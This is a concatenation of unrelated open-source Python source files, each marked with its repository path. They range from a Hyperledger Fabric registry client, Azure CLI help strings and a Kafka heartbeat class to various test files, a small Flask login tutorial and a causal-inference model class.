if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.info("Invalid Org id {}".format(org_id))
return None
else:
params = []
params.append(byte_array_to_hex_str(org_id))
registryDetails = \
self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryRetrieve',
params
)
return registryDetails
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_lookup_next(self, app_type_id, lookup_tag):
"""
Get additional registry lookup results.
This function is called to retrieve additional results of the
Registry lookup initiated by the registry_lookup call.
Parameters:
app_type_id Application type ID that has to be
supported by the workers retrieved
lookup_tag Returned by a previous call to either this function
or to registry_lookup
Returns:
Outputs a tuple on success containing the following:
total_count Total number of entries matching the lookup
criteria. If this number is larger than the number
of IDs returned so far, the caller should use
lookup_tag to call registry_lookup_next to
retrieve the rest of the IDs
new_lookup_tag is an optional parameter. If it is returned, it means
that there are more matching registry IDs that can be
retrieved by calling this function again with this tag
as an input parameter
ids Array of the registry IDs that match the input
parameters
Returns None on error.
"""
if (self.__fabric_wrapper is not None):
if is_valid_hex_str(binascii.hexlify(app_type_id).decode("utf8")):
params = []
params.append(byte_array_to_hex_str(app_type_id))
params.append(lookup_tag)
lookupResult = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryLookUpNext',
params)
else:
logging.info(
"Invalid application type id {}".format(app_type_id))
return None
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_add(self, org_id, uri, sc_addr, app_type_ids):
"""
Add a new registry.
Parameters:
org_id bytes[] identifies organization that hosts the
registry, e.g. a bank in the consortium or an
anonymous entity
uri String defining a URI for this registry that
supports the Off-Chain Worker Registry
JSON RPC API
sc_addr bytes[] defines a Fabric chain code name that
runs the Worker Registry Smart Contract API
smart contract for this registry
app_type_ids []bytes[] is an optional parameter that defines
application types supported by the worker
managed by the registry
Returns:
Transaction receipt on success or None on error.
"""
if (self.__fabric_wrapper is not None):
if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.info("Invalid Org id {}".format(org_id))
return None
if (sc_addr is not None and is_valid_hex_str(
binascii.hexlify(sc_addr).decode("utf8")) is False):
logging.info("Invalid smart contract name {}")
return None
if (not uri):
logging.info("Empty uri {}".format(uri))
return None
app_ids = []
for aid in app_type_ids:
if (is_valid_hex_str(binascii.hexlify(aid).decode("utf8"))
is False):
logging.info("Invalid application id {}".format(aid))
return None
else:
app_ids.append(byte_array_to_hex_str(aid))
params = []
params.append(byte_array_to_hex_str(org_id))
params.append(uri)
params.append(byte_array_to_hex_str(sc_addr))
params.append(','.join(app_ids))
txn_status = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryAdd',
params)
return txn_status
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_update(self, org_id, uri, sc_addr, app_type_ids):
"""
Update a registry.
Parameters:
org_id bytes[] identifies organization that hosts the
registry, e.g. a bank in the consortium or an
anonymous entity
uri string that defines a URI for this registry that
supports the Off-Chain Worker Registry
JSON RPC API
sc_addr bytes[] defines a Fabric chain code name that
runs the Worker Registry Smart Contract API
smart contract for this registry
app_type_ids []bytes[] is an optional parameter that defines
application types supported by the worker
managed by the registry
Returns:
Transaction receipt on success or None on error.
"""
if (self.__fabric_wrapper is not None):
if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.error("Invalid Org id {}".format(org_id))
return None
if (sc_addr is not None and is_valid_hex_str(
binascii.hexlify(sc_addr).decode("utf8")) is False):
logging.error(
"Invalid smart contract address {}".format(sc_addr))
return None
if (not uri):
logging.error("Empty uri {}".format(uri))
return None
app_ids = []
for aid in app_type_ids:
if (is_valid_hex_str(binascii.hexlify(aid).decode("utf8"))
is False):
logging.error("Invalid application id {}".format(aid))
return None
else:
app_ids.append(byte_array_to_hex_str(aid))
params = []
params.append(byte_array_to_hex_str(org_id))
params.append(uri)
params.append(byte_array_to_hex_str(sc_addr))
params.append(','.join(app_ids))
txn_status = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registryUpdate',
params)
return txn_status
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
def registry_set_status(self, org_id, status):
"""
Set registry status.
Parameters:
org_id bytes[] identifies organization that hosts the
registry, e.g. a bank in the consortium or an
anonymous entity
status Defines the registry status to set.
The currently defined values are:
1 - the registry is active
2 - the registry is temporarily "off-line"
3 - the registry is decommissioned
Returns:
Transaction receipt on success or None on error.
"""
if (self.__fabric_wrapper is not None):
if (is_valid_hex_str(binascii.hexlify(org_id).decode("utf8"))
is False):
logging.info("Invalid Org id {}".format(org_id))
return None
if not isinstance(status, RegistryStatus):
logging.info("Invalid registry status {}".format(status))
return None
params = []
params.append(byte_array_to_hex_str(org_id))
params.append(str(status))
txn_status = self.__fabric_wrapper.invoke_chaincode(
self.CHAIN_CODE,
'registrySetStatus',
params)
return txn_status
else:
logging.error(
"Fabric wrapper instance is not initialized")
return None
|
src/connection-monitor-preview/azext_connection_monitor_preview/_help.py | Mannan2812/azure-cli-extensions | 207 | 11187612 | # coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.help_files import helps # pylint: disable=unused-import
helps['network watcher connection-monitor create'] = """
type: command
short-summary: Create a connection monitor.
long-summary: |
This extension allow to create V1 and V2 version of connection monitor.
V1 connection monitor supports single source and destination endpoint which comes with V1 argument groups as usual.
V2 connection monitor supports multiple endpoints and several test protocol which comes with V2 argument groups.
parameters:
- name: --source-resource
short-summary: >
Currently only Virtual Machines are supported.
- name: --dest-resource
short-summary: >
Currently only Virtual Machines are supported.
examples:
- name: Create a connection monitor for a virtual machine.
text: |
az network watcher connection-monitor create -g MyResourceGroup -n MyConnectionMonitorName \\
--source-resource MyVM
- name: Create a V2 connection monitor
text: >
az network watcher connection-monitor create
--name MyV2ConnectionMonitor
--endpoint-source-name "vm01"
--endpoint-source-resource-id MyVM01ResourceID
--endpoint-dest-name bing
--endpoint-dest-address bing.com
--test-config-name TCPTestConfig
--protocol Tcp
--tcp-port 2048
"""
helps['network watcher connection-monitor endpoint'] = """
type: group
short-summary: Manage endpoint of a connection monitor
"""
helps['network watcher connection-monitor endpoint add'] = """
type: command
short-summary: Add an endpoint to a connection monitor
examples:
- name: Add an endpoint as destination
text: >
az network watcher connection-monitor endpoint add
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--address "bing.com"
--dest-test-groups DefaultTestGroup
- name: Add an endpoint as source
text: >
az network watcher connection-monitor endpoint add
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--resource-id MyVMResourceID
--source-test-groups DefaultTestGroup
- name: Add an endpoint with filter
text: >
az network watcher connection-monitor endpoint add
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--resource-id MyLogAnalysisWorkSpaceID
--source-test-groups DefaultTestGroup
--filter-type Include
--filter-item type=AgentAddress address=npmuser
--filter-item type=AgentAddress address=pypiuser
"""
helps['network watcher connection-monitor endpoint remove'] = """
type: command
short-summary: Remove an endpoint from a connection monitor
examples:
- name: Remove endpoint from all test groups of a connection monitor
text: >
az network watcher connection-monitor endpoint remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
- name: Remove endpoint from two test groups of a connection monitor
text: >
az network watcher connection-monitor endpoint remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyEndpoint
--test-groups DefaultTestGroup HealthCheckTestGroup
"""
helps['network watcher connection-monitor endpoint show'] = """
type: command
short-summary: Show an endpoint from a connection monitor
"""
helps['network watcher connection-monitor endpoint list'] = """
type: command
short-summary: List all endpoints form a connection monitor
"""
helps['network watcher connection-monitor test-configuration'] = """
type: group
short-summary: Manage test configuration of a connection monitor
"""
helps['network watcher connection-monitor test-configuration add'] = """
type: command
short-summary: Add a test configuration to a connection monitor
examples:
- name: Add a test configuration with HTTP supported
text: >
az network watcher connection-monitor test-configuration add
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestConfiguration
--test-groups DefaultTestGroup
--protocol Http
--http-request-header name=Host value=bing.com
--http-request-header name=UserAgent value=Edge
- name: Add a test configuration with TCP supported
text: >
az network watcher connection-monitor test-configuration add
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestConfiguration
--test-groups TCPTestGroup DefaultTestGroup
--protocol Tcp
--tcp-port 4096
"""
helps['network watcher connection-monitor test-configuration remove'] = """
type: command
short-summary: Remove a test configuration from a connection monitor
examples:
- name: Remove a test configuration from all test groups of a connection monitor
text: >
az network watcher connection-monitor test-configuration remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyTCPTestConfiguration
- name: Remove a test configuration from two test groups of a connection monitor
text: >
az network watcher connection-monitor test-configuration remove
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestConfiguration
--test-groups HTTPTestGroup DefaultTestGroup
"""
helps['network watcher connection-monitor test-configuration show'] = """
type: command
short-summary: Show a test configuration from a connection monitor
"""
helps['network watcher connection-monitor test-configuration list'] = """
type: command
short-summary: List all test configurations of a connection monitor
"""
helps['network watcher connection-monitor test-group'] = """
type: group
short-summary: Manage a test group of a connection monitor
"""
helps['network watcher connection-monitor test-group add'] = """
type: command
short-summary: Add a test group along with new-added/existing endpoint and test configuration to a connection monitor
examples:
- name: Add a test group along with existing endpoint and test configuration via their names
text: >
az network watcher connection-monitor test-group add
--connection-monitor MyConnectionMonitor
--location westus
--name MyHTTPTestGroup
--endpoint-source-name MySourceEndpoint
--endpoint-dest-name MyDestinationEndpoint
--test-config-name MyTestConfiguration
- name: Add a test group long with new-added source endpoint and existing test configuration via its name
text: >
az network watcher connection-monitor test-group add
--connection-monitor MyConnectionMonitor
--location westus
--name MyAccessibilityTestGroup
--endpoint-source-name MySourceEndpoint
--endpoint-source-resource-id MyLogAnalysisWorkspaceID
--endpoint-dest-name MyExistingDestinationEndpoint
--test-config-name MyExistingTestConfiguration
- name: Add a test group along with new-added endpoints and test configuration
text: >
az network watcher connection-monitor test-group add
--connection-monitor MyConnectionMonitor
--location westus
--name MyAccessibilityTestGroup
--endpoint-source-name MySourceEndpoint
--endpoint-source-resource-id MyVMResourceID
--endpoint-dest-name bing
--endpoint-dest-address bing.com
--test-config-name MyNewTestConfiguration
--protocol Tcp
--tcp-port 4096
"""
helps['network watcher connection-monitor test-group remove'] = """
type: command
short-summary: Remove test group from a connection monitor
"""
helps['network watcher connection-monitor test-group show'] = """
type: command
short-summary: Show a test group of a connection monitor
"""
helps['network watcher connection-monitor test-group list'] = """
type: command
short-summary: List all test groups of a connection monitor
"""
helps['network watcher connection-monitor output'] = """
type: group
short-summary: Manage output of connection monitor
"""
helps['network watcher connection-monitor output add'] = """
type: command
short-summary: Add an output to a connection monitor
"""
helps['network watcher connection-monitor output remove'] = """
type: command
short-summary: Remove all outputs from a connection monitor
"""
helps['network watcher connection-monitor output list'] = """
type: command
short-summary: List all output from a connection monitor
"""
|
kafka/coordinator/heartbeat.py | timgates42/kafka-python | 4,389 | 11187616 | from __future__ import absolute_import, division
import copy
import time
class Heartbeat(object):
DEFAULT_CONFIG = {
'group_id': None,
'heartbeat_interval_ms': 3000,
'session_timeout_ms': 10000,
'max_poll_interval_ms': 300000,
'retry_backoff_ms': 100,
}
def __init__(self, **configs):
self.config = copy.copy(self.DEFAULT_CONFIG)
for key in self.config:
if key in configs:
self.config[key] = configs[key]
if self.config['group_id'] is not None:
assert (self.config['heartbeat_interval_ms']
<= self.config['session_timeout_ms']), (
'Heartbeat interval must be lower than the session timeout')
self.last_send = -1 * float('inf')
self.last_receive = -1 * float('inf')
self.last_poll = -1 * float('inf')
self.last_reset = time.time()
self.heartbeat_failed = None
def poll(self):
self.last_poll = time.time()
def sent_heartbeat(self):
self.last_send = time.time()
self.heartbeat_failed = False
def fail_heartbeat(self):
self.heartbeat_failed = True
def received_heartbeat(self):
self.last_receive = time.time()
def time_to_next_heartbeat(self):
"""Returns seconds (float) remaining before next heartbeat should be sent"""
time_since_last_heartbeat = time.time() - max(self.last_send, self.last_reset)
if self.heartbeat_failed:
delay_to_next_heartbeat = self.config['retry_backoff_ms'] / 1000
else:
delay_to_next_heartbeat = self.config['heartbeat_interval_ms'] / 1000
return max(0, delay_to_next_heartbeat - time_since_last_heartbeat)
def should_heartbeat(self):
return self.time_to_next_heartbeat() == 0
def session_timeout_expired(self):
last_recv = max(self.last_receive, self.last_reset)
return (time.time() - last_recv) > (self.config['session_timeout_ms'] / 1000)
def reset_timeouts(self):
self.last_reset = time.time()
self.last_poll = time.time()
self.heartbeat_failed = False
def poll_timeout_expired(self):
return (time.time() - self.last_poll) > (self.config['max_poll_interval_ms'] / 1000)
|
tools/test_idf_py/test_idf_extensions/test_ext/__init__.py | DCNick3/esp-idf | 8,747 | 11187646 | from .test_extension import action_extensions # noqa: F401
|
malspider_django/dashboard/forms.py | andrewhenke/malspider | 453 | 11187681 | from django import forms
class LoginForm(forms.Form):
username = forms.CharField(label='Username', max_length=100, widget=forms.TextInput(attrs={'class':'form-control', 'placeholder':'username'}))
password = forms.CharField(label='Password', widget=forms.PasswordInput(attrs={'class':'form-control', 'placeholder':'password'}), max_length=200)
|
tests/spinful_fermion_tensor_test.py | anton-buyskikh/QuSpin | 195 | 11187684 | <filename>tests/spinful_fermion_tensor_test.py
from __future__ import print_function, division
import sys,os
quspin_path = os.path.join(os.getcwd(),"../")
sys.path.insert(0,quspin_path)
from quspin.operators import hamiltonian
from quspin.basis import tensor_basis,spinless_fermion_basis_1d,spinful_fermion_basis_1d # Hilbert spaces
import numpy as np # general math functions
from itertools import product
#
##### setting parameters for simulation
# physical parameters
J = 1.0 # hopping strength
U = 5.0 # interaction strength
for L in range(1,8,1):
##### create model
# define site-coupling lists
hop_right = [[-J,i,i+1] for i in range(L-1)] # hopping to the right OBC
hop_left = [[J,i,i+1] for i in range(L-1)] # hopping to the left OBC
int_list = [[U,i,i] for i in range(L)] # onsite interaction
# create static lists
static= [
["+-|", hop_left], # up hop left
["-+|", hop_right], # up hop right
["|+-", hop_left], # down hop left
["|-+", hop_right], # down hop right
["n|n", int_list], # onsite interaction
]
no_checks = dict(check_pcon=False,check_symm=False,check_herm=False,dtype=np.float64)
for N_up, N_down in product(range(L+1),range(L+1)):
print("L=%s, Nup=%s, Ndown=%s" %(L,N_up,N_down) )
###### create the basis
# build the two bases to tensor together to spinful fermions
basis_up = spinless_fermion_basis_1d(L,Nf=N_up) # up basis
basis_down = spinless_fermion_basis_1d(L,Nf=N_down) # down basis
basis_tensor = tensor_basis(basis_up,basis_down) # spinful fermions
basis_spinful = spinful_fermion_basis_1d(L,Nf=(N_up,N_down))
H_tensor = hamiltonian(static,[],basis=basis_tensor,**no_checks)
H_spinful = hamiltonian(static,[],basis=basis_spinful,**no_checks)
E_tensor,V_tensor=H_tensor.eigh()
E_spinful,V_spinful=H_spinful.eigh()
np.testing.assert_allclose(E_tensor-E_spinful,0.0,atol=1E-5,err_msg='Failed tensor and spinfil energies comparison!')
#np.testing.assert_allclose( (H_tensor-H_spinful).toarray(),0.0,atol=1E-5,err_msg='Failed tensor and spinfil energies comparison!')
|
test/common/parameterized_utils.py | parmeet/text | 3,172 | 11187685 | <gh_stars>1000+
import json
from parameterized import param
import os.path
_TEST_DIR_PATH = os.path.realpath(
os.path.join(os.path.dirname(__file__), '..'))
def get_asset_path(*paths):
"""Return full path of a test asset"""
return os.path.join(_TEST_DIR_PATH, 'asset', *paths)
def load_params(*paths):
with open(get_asset_path(*paths), 'r') as file:
return [param(json.loads(line)) for line in file]
|
scale/product/test/utils.py | kaydoh/scale | 121 | 11187710 | """Defines utility methods for testing products"""
from __future__ import unicode_literals
import hashlib
import django.utils.timezone as timezone
from job.test import utils as job_utils
from product.models import FileAncestryLink
from storage.models import ScaleFile
from storage.test import utils as storage_utils
def create_file_link(ancestor=None, descendant=None, job=None, job_exe=None, recipe=None, batch=None):
"""Creates a file ancestry link model for unit testing
:returns: The file ancestry link model
:rtype: :class:`product.models.FileAncestryLink`
"""
if not job:
if descendant and descendant.job:
job = descendant.job
else:
job = job_utils.create_job()
if not job_exe:
if descendant and descendant.job_exe:
job_exe = descendant.job_exe
else:
job_exe = job_utils.create_job_exe(job_type=job.job_type, job=job)
return FileAncestryLink.objects.create(ancestor=ancestor, descendant=descendant, job=job, job_exe=job_exe,
recipe=recipe, batch=batch)
def create_product(job_exe=None, workspace=None, has_been_published=False, is_published=False, uuid=None,
file_name='my_test_file.txt', file_path='/file/path/my_test_file.txt', media_type='text/plain',
file_size=100, countries=None, is_superseded=False, superseded=None):
"""Creates a product file model for unit testing
:returns: The product model
:rtype: :class:`storage.models.ScaleFile`
"""
if not job_exe:
job_exe = job_utils.create_job_exe()
if not workspace:
workspace = storage_utils.create_workspace()
if not uuid:
builder = hashlib.md5()
builder.update(str(job_exe.job.job_type.id))
builder.update(file_name)
uuid = builder.hexdigest()
if is_superseded and not superseded:
superseded = timezone.now()
product_file = ScaleFile.objects.create(file_type='PRODUCT', job_exe=job_exe, job=job_exe.job,
job_type=job_exe.job.job_type, has_been_published=has_been_published,
is_published=is_published, uuid=uuid, file_name=file_name,
media_type=media_type, file_size=file_size, file_path=file_path,
workspace=workspace, is_superseded=is_superseded, superseded=superseded)
if countries:
product_file.countries = countries
product_file.save()
return product_file
|
env/Lib/site-packages/OpenGL/GLES2/APPLE/texture_packed_float.py | 5gconnectedbike/Navio2 | 210 | 11187726 | '''OpenGL extension APPLE.texture_packed_float
This module customises the behaviour of the
OpenGL.raw.GLES2.APPLE.texture_packed_float to provide a more
Python-friendly API
Overview (from the spec)
This extension adds two new 3-component floating-point texture formats
that fit within a single 32-bit word called R11F_G11F_B10F and RGB9_E5
The first RGB format, R11F_G11F_B10F, stores 5 bits of biased exponent
per component in the same manner as 16-bit floating-point formats, but
rather than 10 mantissa bits, the red, green, and blue components have
6, 6, and 5 bits respectively. Each mantissa is assumed to have an
implied leading one except in the denorm exponent case. There is no
sign bit so only non-negative values can be represented. Positive
infinity, positivedenorms, and positive NaN values are representable.
The value of the fourth component returned by a texture fetch is always
1.0.
The second RGB format, RGB9_E5, stores a single 5-bit exponent (biased
up by 15) and three 9-bit mantissas for each respective component.
There is no sign bit so all three components must be non-negative.
The fractional mantissas are stored without an implied 1 to the left
of the decimal point. Neither infinity nor not-a-number (NaN) are
representable in this shared exponent format.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/APPLE/texture_packed_float.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GLES2 import _types, _glgets
from OpenGL.raw.GLES2.APPLE.texture_packed_float import *
from OpenGL.raw.GLES2.APPLE.texture_packed_float import _EXTENSION_NAME
def glInitTexturePackedFloatAPPLE():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
rpython/jit/metainterp/optimizeopt/test/test_intdiv.py | nanjekyejoannah/pypy | 381 | 11187738 | <reponame>nanjekyejoannah/pypy<gh_stars>100-1000
import sys
import py
from hypothesis import given, strategies
from rpython.jit.metainterp.optimizeopt.intdiv import magic_numbers, LONG_BIT
from rpython.jit.metainterp.optimizeopt.intdiv import division_operations
from rpython.jit.metainterp.optimizeopt.intdiv import modulo_operations
from rpython.jit.metainterp.optimizeopt.intdiv import unsigned_mul_high
from rpython.jit.metainterp.history import ConstInt
from rpython.jit.metainterp.resoperation import InputArgInt
from rpython.jit.metainterp.executor import execute
not_power_of_two = (strategies.integers(min_value=3, max_value=sys.maxint)
.filter(lambda m: (m & (m - 1)) != 0))
@given(strategies.integers(min_value=0, max_value=sys.maxint),
not_power_of_two)
def test_magic_numbers(n, m):
k, i = magic_numbers(m)
k = int(k) # and no longer r_uint, with wrap-around semantics
a = (n * k) >> (LONG_BIT + i)
assert a == n // m
@given(strategies.integers(min_value=0, max_value=2*sys.maxint+1),
strategies.integers(min_value=0, max_value=2*sys.maxint+1))
def test_unsigned_mul_high(a, b):
c = unsigned_mul_high(a, b)
assert c == ((a * b) >> LONG_BIT)
@given(strategies.integers(min_value=-sys.maxint-1, max_value=sys.maxint),
not_power_of_two,
strategies.booleans())
def test_division_operations(n, m, known_nonneg):
if n < 0:
known_nonneg = False
n_box = InputArgInt()
ops = division_operations(n_box, m, known_nonneg)
constants = {n_box: ConstInt(n)}
for op in ops:
argboxes = op.getarglist()
constantboxes = [constants.get(box, box) for box in argboxes]
res = execute(None, None, op.getopnum(), None, *constantboxes)
constants[op] = ConstInt(res)
assert constants[op].getint() == n // m
@given(strategies.integers(min_value=-sys.maxint-1, max_value=sys.maxint),
not_power_of_two,
strategies.booleans())
def test_modulo_operations(n, m, known_nonneg):
if n < 0:
known_nonneg = False
n_box = InputArgInt()
ops = modulo_operations(n_box, m, known_nonneg)
constants = {n_box: ConstInt(n)}
for op in ops:
argboxes = op.getarglist()
constantboxes = [constants.get(box, box) for box in argboxes]
res = execute(None, None, op.getopnum(), None, *constantboxes)
constants[op] = ConstInt(res)
assert constants[op].getint() == n % m
|
bag/simulation/__init__.py | felixonmars/BAG_framework | 123 | 11187748 | <reponame>felixonmars/BAG_framework
# -*- coding: utf-8 -*-
"""This package defines various utility classes for running simulations and data post-processing.
""" |
special/kfold/model/model_interface.py | dumpmemory/pytorch-lightning-template | 257 | 11187749 | # Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import inspect
import torch
import importlib
from torch.nn import functional as F
import torch.optim.lr_scheduler as lrs
import pytorch_lightning as pl
class MInterface(pl.LightningModule):
def __init__(self, model_name, loss, lr, **kargs):
super().__init__()
self.save_hyperparameters()
self.load_model()
self.configure_loss()
def forward(self, img):
return self.model(img)
def training_step(self, batch, batch_idx):
img, labels, filename = batch
out = self(img)
loss = self.loss_function(out, labels)
self.log('loss', loss, on_step=True, on_epoch=True, prog_bar=True)
return loss
def validation_step(self, batch, batch_idx):
img, labels, filename = batch
out = self(img)
loss = self.loss_function(out, labels)
label_digit = labels.argmax(axis=1)
out_digit = out.argmax(axis=1)
correct_num = sum(label_digit == out_digit).cpu().item()
self.log('val_loss', loss, on_step=False, on_epoch=True, prog_bar=True)
self.log('val_acc', correct_num/len(out_digit),
on_step=False, on_epoch=True, prog_bar=True)
return (correct_num, len(out_digit))
def test_step(self, batch, batch_idx):
# Here we just reuse the validation_step for testing
return self.validation_step(batch, batch_idx)
def on_validation_epoch_end(self):
# Make the Progress Bar leave there
self.print('')
def configure_optimizers(self):
if hasattr(self.hparams, 'weight_decay'):
weight_decay = self.hparams.weight_decay
else:
weight_decay = 0
optimizer = torch.optim.Adam(
self.parameters(), lr=self.hparams.lr, weight_decay=weight_decay)
if self.hparams.lr_scheduler is None:
return optimizer
else:
if self.hparams.lr_scheduler == 'step':
scheduler = lrs.StepLR(optimizer,
step_size=self.hparams.lr_decay_steps,
gamma=self.hparams.lr_decay_rate)
elif self.hparams.lr_scheduler == 'cosine':
scheduler = lrs.CosineAnnealingLR(optimizer,
T_max=self.hparams.lr_decay_steps,
eta_min=self.hparams.lr_decay_min_lr)
else:
raise ValueError('Invalid lr_scheduler type!')
return [optimizer], [scheduler]
def configure_loss(self):
loss = self.hparams.loss.lower()
if loss == 'mse':
self.loss_function = F.mse_loss
elif loss == 'l1':
self.loss_function = F.l1_loss
elif loss == 'bce':
self.loss_function = F.binary_cross_entropy
else:
raise ValueError("Invalid Loss Type!")
def load_model(self):
name = self.hparams.model_name
# Change the `snake_case.py` file name to `CamelCase` class name.
# Please always name your model file name as `snake_case.py` and
# class name corresponding `CamelCase`.
camel_name = ''.join([i.capitalize() for i in name.split('_')])
try:
Model = getattr(importlib.import_module(
'.'+name, package=__package__), camel_name)
except:
raise ValueError(
f'Invalid Module File Name or Invalid Class Name {name}.{camel_name}!')
self.model = self.instancialize(Model)
def instancialize(self, Model, **other_args):
""" Instancialize a model using the corresponding parameters
from self.hparams dictionary. You can also input any args
to overwrite the corresponding value in self.hparams.
"""
class_args = inspect.getargspec(Model.__init__).args[1:]
inkeys = self.hparams.keys()
args1 = {}
for arg in class_args:
if arg in inkeys:
args1[arg] = getattr(self.hparams, arg)
args1.update(other_args)
return Model(**args1)
|
Flask/helloworld.py | Zhgx/bili | 166 | 11187795 | <reponame>Zhgx/bili
from flask import Flask, request, jsonify, session
from werkzeug.utils import redirect
app = Flask(__name__)
app.secret_key = "asdasdasdasdasdsaa"
@app.route("/", methods=["GET"])
def hello_world():
return "hello 音宫"
@app.route("/hey/<username>")
def hey_yingong(username):
return "我是 %s" % (username + username)
@app.route("/my/<float:number>")
def my_number(number):
return "我的数字 %s" % (number + number)
@app.route("/bilibili")
def bilibili():
return redirect("https://www.bilibili.com/")
@app.route("/test/my/first", methods=["POST"])
def first_post():
try:
my_json = request.get_json()
print(my_json)
get_name = my_json.get("name")
get_age = my_json.get("age")
if not all([get_name, get_age]):
return jsonify(msg="缺少参数")
get_age += 10
return jsonify(name=get_name, age=get_age)
except Exception as e:
print(e)
return jsonify(msg="出错了哦,请查看是否正确访问")
# 登录
@app.route("/try/login", methods=["POST"])
def login():
"""
账号 username asd123
密码 password <PASSWORD>
:return:
"""
get_data = request.get_json()
username = get_data.get("username")
password = get_data.get("password")
if not all([username, password]):
return jsonify(msg="参数不完整")
if username == "asd123" and password == "<PASSWORD>":
# 如果验证通过 保存登录状态在session中
session["username"] = username
return jsonify(msg="登录成功")
else:
return jsonify(msg="账号或密码错误")
# 检查登录状态
@app.route("/session", methods=["GET"])
def check_session():
username = session.get("username")
if username is not None:
# 操作逻辑 数据库什么的
# 数据库里面 把你的头像 等级 金币数量 查询出来
return jsonify(username=username)
else:
return jsonify(msg="出错了,没登录")
# 登出
@app.route("/try/logout", methods=["GET"])
def logout():
session.clear()
return jsonify(msg="成功退出登录!")
app.run(host="0.0.0.0")
|
causalinference/causal.py | youngminju-phd/Causalinference | 392 | 11187920 | from __future__ import division
import numpy as np
from itertools import combinations_with_replacement
from .core import Data, Summary, Propensity, PropensitySelect, Strata
from .estimators import OLS, Blocking, Weighting, Matching, Estimators
class CausalModel(object):
"""
Class that provides the main tools of Causal Inference.
"""
def __init__(self, Y, D, X):
self.old_data = Data(Y, D, X)
self.reset()
def reset(self):
"""
Reinitializes data to original inputs, and drops any estimated
results.
"""
Y, D, X = self.old_data['Y'], self.old_data['D'], self.old_data['X']
self.raw_data = Data(Y, D, X)
self.summary_stats = Summary(self.raw_data)
self.propensity = None
self.cutoff = None
self.blocks = None
self.strata = None
self.estimates = Estimators()
def est_propensity(self, lin='all', qua=None):
"""
Estimates the propensity scores given list of covariates to
include linearly or quadratically.
The propensity score is the conditional probability of
receiving the treatment given the observed covariates.
Estimation is done via a logistic regression.
Parameters
----------
lin: string or list, optional
Column numbers (zero-based) of variables of
the original covariate matrix X to include
linearly. Defaults to the string 'all', which
uses whole covariate matrix.
qua: list, optional
Tuples indicating which columns of the original
covariate matrix to multiply and include. E.g.,
[(1,1), (2,3)] indicates squaring the 2nd column
and including the product of the 3rd and 4th
columns. Default is to not include any
quadratic terms.
"""
lin_terms = parse_lin_terms(self.raw_data['K'], lin)
qua_terms = parse_qua_terms(self.raw_data['K'], qua)
self.propensity = Propensity(self.raw_data, lin_terms, qua_terms)
self.raw_data._dict['pscore'] = self.propensity['fitted']
self._post_pscore_init()
def est_propensity_s(self, lin_B=None, C_lin=1, C_qua=2.71):
"""
Estimates the propensity score with covariates selected using
the algorithm suggested by [1]_.
The propensity score is the conditional probability of
receiving the treatment given the observed covariates.
Estimation is done via a logistic regression.
The covariate selection algorithm is based on a sequence
of likelihood ratio tests.
Parameters
----------
lin_B: list, optional
Column numbers (zero-based) of variables of
the original covariate matrix X to include
linearly. Defaults to empty list, meaning
every column of X is subjected to the
selection algorithm.
C_lin: scalar, optional
Critical value used in likelihood ratio tests
to decide whether candidate linear terms should
be included. Defaults to 1 as in [1]_.
C_qua: scalar, optional
Critical value used in likelihood ratio tests
to decide whether candidate quadratic terms
should be included. Defaults to 2.71 as in
[1]_.
References
----------
.. [1] <NAME>. & <NAME>. (2015). Causal Inference in
Statistics, Social, and Biomedical Sciences: An
Introduction.
"""
lin_basic = parse_lin_terms(self.raw_data['K'], lin_B)
self.propensity = PropensitySelect(self.raw_data, lin_basic,
C_lin, C_qua)
self.raw_data._dict['pscore'] = self.propensity['fitted']
self._post_pscore_init()
def trim(self):
"""
Trims data based on propensity score to create a subsample with
better covariate balance.
The default cutoff value is set to 0.1. To set a custom cutoff
value, modify the object attribute named cutoff directly.
This method should only be executed after the propensity score
has been estimated.
"""
if 0 < self.cutoff <= 0.5:
pscore = self.raw_data['pscore']
keep = (pscore >= self.cutoff) & (pscore <= 1-self.cutoff)
Y_trimmed = self.raw_data['Y'][keep]
D_trimmed = self.raw_data['D'][keep]
X_trimmed = self.raw_data['X'][keep]
self.raw_data = Data(Y_trimmed, D_trimmed, X_trimmed)
self.raw_data._dict['pscore'] = pscore[keep]
self.summary_stats = Summary(self.raw_data)
self.strata = None
self.estimates = Estimators()
elif self.cutoff == 0:
pass
else:
raise ValueError('Invalid cutoff.')
def trim_s(self):
"""
Trims data based on propensity score using the cutoff
selection algorithm suggested by [1]_.
This method should only be executed after the propensity score
has been estimated.
References
----------
